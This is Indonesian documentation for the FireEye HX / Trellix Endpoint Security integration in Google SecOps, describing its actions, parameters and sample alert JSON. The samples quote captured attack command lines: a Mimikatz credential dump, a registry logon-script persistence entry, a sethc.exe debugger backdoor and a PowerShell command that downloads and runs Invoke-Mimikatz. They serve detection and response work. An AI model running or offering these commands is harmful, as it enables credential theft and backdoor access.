FireEye HX
Versi integrasi: 17.0
Mengonfigurasi integrasi FireEye HX di Google Security Operations
Untuk mendapatkan petunjuk mendetail terkait cara mengonfigurasi integrasi di Google SecOps, lihat Mengonfigurasi integrasi.
Parameter integrasi
Gunakan parameter berikut untuk mengonfigurasi integrasi:
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Nama Instance | String | T/A | Tidak | Nama Instance yang ingin Anda konfigurasi integrasinya. |
| Deskripsi | String | T/A | Tidak | Deskripsi Instance. |
| Server | String | https://x.x.x.x:<port> | Ya | Alamat instance Trellix Endpoint Security. |
| Nama pengguna | String | T/A | Ya | Alamat email pengguna yang harus digunakan untuk terhubung ke Trellix Endpoint Security. |
| Sandi | Sandi | T/A | Ya | Sandi pengguna yang sesuai. |
| Verifikasi SSL | Kotak centang | Dicentang | Tidak | Gunakan kotak centang ini jika koneksi Trellix Endpoint Security Anda memerlukan verifikasi SSL (dicentang secara default). |
| Menjalankan dari Jarak Jauh | Kotak centang | Tidak dicentang | Tidak | Centang kolom untuk menjalankan integrasi yang dikonfigurasi dari jarak jauh. Setelah dicentang, opsi akan muncul untuk memilih pengguna jarak jauh (agen). |
Tindakan
Membatalkan Pembatasan Host
Deskripsi
Buat host pembatalan yang berisi tugas di server Trellix Endpoint Security berdasarkan IP Google SecOps atau host entitas Google SecOps.
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
N/A
Berisi Host
Deskripsi
Buat tugas contain host di server Trellix Endpoint Security berdasarkan IP Google SecOps atau host entitas Google SecOps.
Parameter
| Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Menyetujui Pembatasan | Kotak centang | Tidak dicentang | Tidak | Tentukan apakah permintaan pembatasan untuk host harus disetujui secara otomatis untuk membuat tugas batasi host di server Trellix Endpoint Security. Jika tidak disetujui secara otomatis, permintaan penampungan dapat disetujui di konsol web Trellix Endpoint Security. |
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
N/A
Mendapatkan Pemberitahuan
Deskripsi
Mendapatkan pemberitahuan Trellix Endpoint Security berdasarkan entity Google SecOps dan kondisi penelusuran yang diberikan. Tindakan ini berfungsi di host atau entitas IP Google SecOps.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Batas | Bilangan bulat | T/A | Tidak | Jumlah notifikasi yang harus ditampilkan oleh tindakan, misalnya, 100. |
| Memiliki Mode Berbagi | Menu Drop-Down _(default = any)_ | _default = any_ | Tidak | Memfilter pemberitahuan yang dipicu dari indikator dengan mode berbagi tertentu. _Nilai yang tersedia: any, restricted, dan unrestricted._ |
| Status Penyelesaian Pemberitahuan | Menu Drop-Down _(default = any)_ | _default = any_ | Tidak | Memfilter notifikasi berdasarkan status penyelesaian notifikasi. Nilai yang tersedia: _any, active_threat, alert, block, partial_block._ |
| Pemberitahuan Dilaporkan dalam x Jam Terakhir | Bilangan bulat | T/A | Tidak | Memfilter pemberitahuan yang dilaporkan dalam x jam terakhir, misalnya, 4 jam terakhir. |
| Sumber Notifikasi | Menu Drop-Down _(default = any)_ | _default = any_ | Tidak | Sumber notifikasi. Nilai yang tersedia: any, exd (deteksi eksploitasi), mal (peringatan malware), ioc (indikator penyusupan). |
| ID Kondisi | String | T/A | Tidak | Memfilter pemberitahuan menurut ID kondisi tertentu. |
| ID pemberitahuan | String | T/A | Tidak | Menampilkan peringatan tertentu berdasarkan ID peringatan. |
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
[
{
"EntityResult": [{
"indicator": {
"category": "Mandiant",
"display_name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
"signature": null,
"_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
"uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
},
"event_id": 12880,
"event_values": {
"processEvent/processCmdLine": "at 13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
"processEvent/parentPid": 4832,
"processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
"processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/timestamp": "2020-05-29T10:21:03.419Z",
"processEvent/startTime": "2020-05-29T10:21:03.419Z",
"processEvent/process": "at.exe",
"processEvent/username": "DOMAIN-COM\\\\Administrator",
"processEvent/pid": 7332,
"processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"processEvent/eventType": "start"
},
"event_type": "processEvent",
"subtype": null,
"reported_at": "2020-05-29T10:24:05.410Z",
"decorators": [],
"md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
"appliance": {
"_id": "86B7F11ACF8D"
},
"agent": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"containment_state": "normal"
},
"is_false_positive": false,
"event_at": "2020-05-29T10:21:03.419Z",
"source": "IOC",
"matched_at": "2020-05-29T10:23:22.000Z",
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/88",
"_id": 88,
"resolution": "ALERT",
"condition": {
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
"_id": "yirelRwhiuXlF0bQhTL4GA=="
},
"matched_source_alerts": []
}],
"Entity": "PC-01"
}
]
Mendapatkan Detail Grup Pemberitahuan
Deskripsi
Mendapatkan detail lengkap grup pemberitahuan untuk Grup Pemberitahuan yang diberikan berdasarkan ID-nya.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| ID Grup Pemberitahuan | String | T/A | Ya | Tentukan daftar ID Grup Pemberitahuan yang dipisahkan koma yang detailnya ingin Anda ambil. |
Run On
Tindakan ini tidak berjalan pada entitas, tetapi memiliki parameter input wajib.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
{
"details": [],
"route": "/hx/api/v3/alert_groups/id",
"data": {
"_id": "622d3688031aa40faa4bd86028841276",
"assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\reg.exe",
"first_event_at": "2020-08-06T06:32:55.761Z",
"last_event_at": "2020-08-06T06:32:55.761Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 729,
"agent": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"containment_state": "normal"
},
"condition": {
"_id": "yirelRwhiuXlF0bQhTL4GA==",
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
},
"event_at": "2020-08-06T06:32:55.761+00:00",
"matched_at": "2020-08-06T06:37:55+00:00",
"reported_at": "2020-12-18T14:03:18.856+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"05cf3ce225b05b669e3118092f4c8eab"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/729",
"event_id": 207,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-06T06:32:55.761Z",
"processEvent/eventType": "start",
"processEvent/pid": 10356,
"processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
"processEvent/process": "reg.exe",
"processEvent/parentPid": 9456,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-06T06:32:55.761Z",
"processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
"processEvent/processCmdLine": "REG ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
"created_at": "2020-12-18T14:03:24.535Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "yirelRwhiuXlF0bQhTL4GA==",
"detected_by": "ioc_engine",
"host": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"primary_ip_address": "172.30.202.55"
}
}
},
"message": "OK"
}
Repositori Kasus
| Jenis hasil | Nilai/Deskripsi | Jenis |
| Pesan output* | Berhasil untuk 1 (is_success=true): Berhasil mengambil detail tentang grup pemberitahuan berikut di Trellix Endpoint Security: {alert group ids} Tidak berhasil untuk 1 (is_success=true): Tindakan tidak dapat mengambil detail tentang grup pemberitahuan berikut di Trellix Endpoint Security: {alert group ids} Tidak berhasil untuk semua (is_success=false): Tidak ada grup pemberitahuan yang disediakan ditemukan di Trellix Endpoint Security. |
Umum |
| Repositori Kasus | Nama: Detail Grup Pemberitahuan
|
Umum |
Mendapatkan Pemberitahuan dalam Grup Pemberitahuan
Deskripsi
Mendapatkan semua pemberitahuan yang ditemukan dalam grup pemberitahuan yang ditentukan
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| ID Grup Notifikasi | String | T/A | Ya | Tentukan daftar ID Grup Pemberitahuan yang dipisahkan koma yang detailnya ingin Anda ambil. |
| Batas | Bilangan bulat | 50 | Tidak | Tentukan jumlah maksimum listingan notifikasi yang ditampilkan dari API, untuk grup notifikasi. Default-nya adalah 50. |
Run On
Tindakan ini tidak berjalan pada entitas, tetapi memiliki parameter input wajib.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": 712,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T08:04:09.521Z",
"matched_at": "2020-12-10T08:04:43.000Z",
"reported_at": "2020-12-10T08:04:49.607Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/712",
"event_id": 853899,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8800,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
},
{
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T09:26:14.114Z",
"matched_at": "2020-12-10T09:26:56.000Z",
"reported_at": "2020-12-10T09:27:08.735Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups/group_id/alerts"
}
Repositori Kasus
| Jenis hasil | Nilai/Deskripsi | Jenis |
|---|---|---|
| Pesan output* | Berhasil untuk 1 (is_success=true): Berhasil mengambil detail tentang grup pemberitahuan berikut di Trellix Endpoint Security: {alert group ids} Tidak berhasil untuk 1 (is_success=true): Tindakan tidak dapat mengambil detail tentang grup pemberitahuan berikut di Trellix Endpoint Security: {alert group ids} Tidak berhasil untuk semua (is_success=false): Tidak ada grup pemberitahuan yang disediakan ditemukan di Trellix Endpoint Security. |
Umum |
| Repositori Kasus | Nama: "Trellix Endpoint Security Alert Group +{alert_group_id) Alerts"
|
Umum |
Mendapatkan Info Host
Deskripsi
Memperkaya entitas Host atau IP Google SecOps berdasarkan informasi dari Trellix Endpoint Security.
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
[
{
"EntityResult": {
"last_alert": {
"url": "/hx/api/v3/alerts/254",
"_id": 254
},
"domain": "EXAMPLE-COM",
"last_exploit_block_timestamp": null,
"containment_state": "normal",
"timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
"gmt_offset_seconds": 10800,
"initial_agent_checkin": "2020-05-29T10:11:12.022Z",
"stats": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"primary_mac": "00-50-56-11-22-33",
"hostname": "HW-HOST-025",
"primary_ip_address": "1.1.1.1",
"last_audit_timestamp": "2020-06-01T09:10:38.752Z",
"last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
"containment_queued": false,
"sysinfo": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
},
"last_exploit_block": null,
"reported_clone": false,
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"excluded_from_containment": false,
"last_poll_timestamp": "2020-06-01T09:10:36.000Z",
"last_poll_ip": "1.1.1.1",
"containment_missing_software": false,
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"os": {
"kernel_version": null,
"platform": "win",
"patch_level": null,
"bitness": "64-bit",
"product_name": "Windows 10 Pro"
},
"agent_version": "32.30.0"
},
"Entity": "PC-01"
}
]
Mendapatkan Indikator
Deskripsi
Mendapatkan informasi tentang Indikator tertentu dari server Trellix Endpoint Security.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Kategori Indikator | String | T/A | Ya | Tentukan nilai uri_name kategori indikator. uri_name dapat ditemukan dengan menjalankan tindakan "Get Indicators". |
| Nama Indikator | String | T/A | Ya | Tentukan nilai uri_name indikator. uri_name dapat ditemukan dengan menjalankan tindakan "Get Indicators". |
Run On
Tindakan ini dijalankan di semua entity.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win\", \"osx\", \"linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
Mendapatkan Indikator
Deskripsi
Mendapatkan informasi tentang indikator kompromi (IOC) dari server Trellix Endpoint Security berdasarkan parameter penelusuran yang diberikan.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Kategori Indikator | String | T/A | Tidak | Kategori indikator. |
| Istilah Penelusuran | String | T/A | Tidak | Istilah penelusuran dapat berupa nama, kategori, tanda tangan, sumber, atau nilai kondisi apa pun. |
| Batas | String | T/A | Tidak | Jumlah tindakan indikator yang harus ditampilkan, misalnya, 100. |
| Mode Berbagi | Menu Drop-Down _(default = any)_ | _default = any_ | Tidak | Memfilter indikator berdasarkan mode berbagi tertentu. _Nilai yang tersedia: any, restricted, unrestricted._ |
| Urutkan menurut Kolom | String | T/A | Tidak | Mengurutkan hasil menurut kolom yang ditentukan dalam urutan menaik. |
| Dibuat oleh | String | T/A | Tidak | Memfilter indikator berdasarkan penulis. |
| Memiliki notifikasi terkait | Kotak centang | T/A | Tidak | Tentukan apakah hanya indikator yang memiliki pemberitahuan terkait yang harus ditampilkan. |
Run On
Tindakan ini dijalankan di semua entity.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
[
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win", "osx", "linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
]
Mendapatkan Daftar Akuisisi File untuk Host
Deskripsi
Mendapatkan daftar akuisisi file yang diminta untuk host dari server Trellix Endpoint Security. Tindakan ini berfungsi pada entity Google SecOps host atau IP.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Istilah Penelusuran | String | T/A | Tidak | Menelusuri semua akuisisi file untuk host yang terhubung ke server Trellix Endpoint Security. search_term dapat berupa nilai kondisi apa pun. |
| Batas | String | T/A | Tidak | Jumlah data yang harus ditampilkan oleh tindakan, misalnya, 100. |
| Kolom Filter | String | T/A | Tidak | Hanya mencantumkan hasil dengan nilai kolom yang ditentukan, hasil dapat difilter berdasarkan ID korelasi eksternal (external_id). |
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
[
{
"EntityResult": [{
"comment": " ",
"zip_passphrase": "unzip-me",
"indicator": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"request_actor": {
"username": "admin",
"_id": 1000
},
"request_time": "2020-06-01T08:43:14.000Z",
"finish_time": "2020-06-01T08:46:39.156Z",
"_revision": "20200601084639156575147403",
"error_message": "The acquisition completed with issues.",
"req_use_api": false,
"alert": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"url": "/hx/api/v3/acqs/files/9",
"state": "COMPLETE",
"host": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id":
"FqNP4ybCdrlfVqG3lrCvRP"
},
"req_filename": "reg.exe",
"req_path": "C:\\\\Windows\\\\System32",
"_id": 9,
"external_id": null,
"condition": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"md5": "601bddf7691c5af626a5719f1d7e35f1"
}],
"Entity": "PC-01"
}
]
Adalah Peringatan Berisi Malware
Deskripsi
Periksa apakah ada pemberitahuan malware untuk entitas Host atau IP Google SecOps yang diberikan di server Trellix Endpoint Security.
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
[
{
"EntityResult": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"Entity": "PC-01"
}
]
Ping
Deskripsi
Uji konektivitas ke server Trellix Endpoint Security dengan parameter yang diberikan di halaman konfigurasi integrasi pada tab Google Security Operations Marketplace.
Run On
Tindakan ini dijalankan di semua entity.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
N/A
Mengonfirmasi Grup Pemberitahuan
Deskripsi
Mengonfirmasi grup pemberitahuan yang ditangani oleh Google SecOps untuk menyinkronkan dengan lebih baik antara platform HX dan Google SecOps.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| ID Grup Notifikasi | Daftar yang dipisahkan koma | T/A | Ya | Tentukan ID Grup Pemberitahuan yang ingin Anda Konfirmasi, dalam daftar yang dipisahkan koma. |
| Konfirmasi | DDL | Konfirmasi | Ya | Tentukan apakah Anda ingin Mengonfirmasi atau Membatalkan konfirmasi grup pemberitahuan yang ditentukan. |
| Komentar Konfirmasi | String | T/A | Tidak | Tentukan komentar konfirmasi yang ingin Anda tambahkan ke grup pemberitahuan yang relevan. |
| Batas | Bilangan bulat | T/A | Tidak | Tentukan jumlah maksimum listingan grup pemberitahuan yang ditampilkan dari API, dalam hasil JSON. |
Run On
Tindakan ini tidak berjalan pada entitas, tetapi memiliki parameter input wajib.
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": "4532f4d8d50ab50a7830e2823ac488fd",
"assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2020-08-17T12:03:38.496Z",
"last_event_at": "2020-12-10T08:02:22.561Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 718,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
},
"event_at": "2020-08-17T12:03:38.496+00:00",
"matched_at": "2020-12-10T09:26:55+00:00",
"reported_at": "2020-12-10T09:27:08.624+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"cda48fc75952ad12d99e526d0b6bf70a"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/718",
"event_id": 39882,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-17T12:03:38.496Z",
"processEvent/eventType": "start",
"processEvent/pid": 9896,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 5560,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-17T12:03:38.496Z",
"processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
"processEvent/processCmdLine": "powershell.exe \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\" "
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 3
},
"url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
"created_at": "2020-12-10T09:26:56.056Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
},
{
"_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
"assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"file_full_path": "",
"first_event_at": "2020-12-10T08:04:09.521Z",
